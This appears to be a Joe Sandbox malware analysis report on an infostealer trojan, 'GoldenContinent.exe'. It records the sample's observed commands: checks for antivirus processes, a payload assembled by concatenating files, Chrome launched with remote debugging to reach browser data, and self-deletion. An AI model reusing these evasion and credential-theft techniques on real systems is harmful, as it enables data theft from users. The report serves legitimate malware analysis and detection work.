                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00BF924010_2_00BF9240
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C8531110_2_00C85311
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00BF96E010_2_00BF96E0
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C1170410_2_00C11704
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C11A7610_2_00C11A76
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C17B8B10_2_00C17B8B
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00BF9B6010_2_00BF9B60
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C17DBA10_2_00C17DBA
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C11D2010_2_00C11D20
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C11FE710_2_00C11FE7
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\523266\Relationship.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: String function: 00C0FD52 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: String function: 00C10DA0 appears 46 times
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: String function: 004062CF appears 58 times
                Source: GoldenContinent.exeStatic PE information: invalid certificate
                Source: GoldenContinent.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@43/39@5/6
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C641FA GetLastError,FormatMessageW,10_2_00C641FA
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C52010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00C52010
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C51A0B AdjustTokenPrivileges,CloseHandle,10_2_00C51A0B
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C5DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_00C5DD87
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C63A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,10_2_00C63A0E
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\AR9WOJ0I.htmJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
                Source: C:\Users\user\Desktop\GoldenContinent.exeFile created: C:\Users\user\AppData\Local\Temp\nss264A.tmpJump to behavior
                Source: GoldenContinent.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\GoldenContinent.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Relationship.com, 0000000A.00000002.2594809497.000000000422C000.00000004.00000800.00020000.00000000.sdmp, WT0R1DJWB.10.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: GoldenContinent.exeVirustotal: Detection: 12%
                Source: C:\Users\user\Desktop\GoldenContinent.exeFile read: C:\Users\user\Desktop\GoldenContinent.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\GoldenContinent.exe "C:\Users\user\Desktop\GoldenContinent.exe"
                Source: C:\Users\user\Desktop\GoldenContinent.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Jam Jam.cmd & Jam.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 523266
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "landing" Ca
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Existing + ..\Lower + ..\Wants + ..\Elvis + ..\Distribution x
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\523266\Relationship.com Relationship.com x
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2520 --field-trial-handle=2344,i,12562058897419694895,3034342051900266821,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\523266\Relationship.com" & rd /s /q "C:\ProgramData\8Y5XTR16XLN7" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\Desktop\GoldenContinent.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Jam Jam.cmd & Jam.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 523266Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "landing" Ca Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Existing + ..\Lower + ..\Wants + ..\Elvis + ..\Distribution xJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\523266\Relationship.com Relationship.com xJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\523266\Relationship.com" & rd /s /q "C:\ProgramData\8Y5XTR16XLN7" & exitJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2520 --field-trial-handle=2344,i,12562058897419694895,3034342051900266821,262144 /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: GoldenContinent.exeStatic file information: File size 1122075 > 1048576
                Source: GoldenContinent.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: GoldenContinent.exeStatic PE information: real checksum: 0x11bd4e should be: 0x117ea2
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C10DE6 push ecx; ret 10_2_00C10DF9

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\523266\Relationship.comJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\523266\Relationship.comJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C826DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00C826DD
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C0FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00C0FC7C
                Source: C:\Users\user\Desktop\GoldenContinent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_10-103440
                Source: Relationship.com, 0000000A.00000002.2594230702.00000000040F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comAPI coverage: 3.8 %
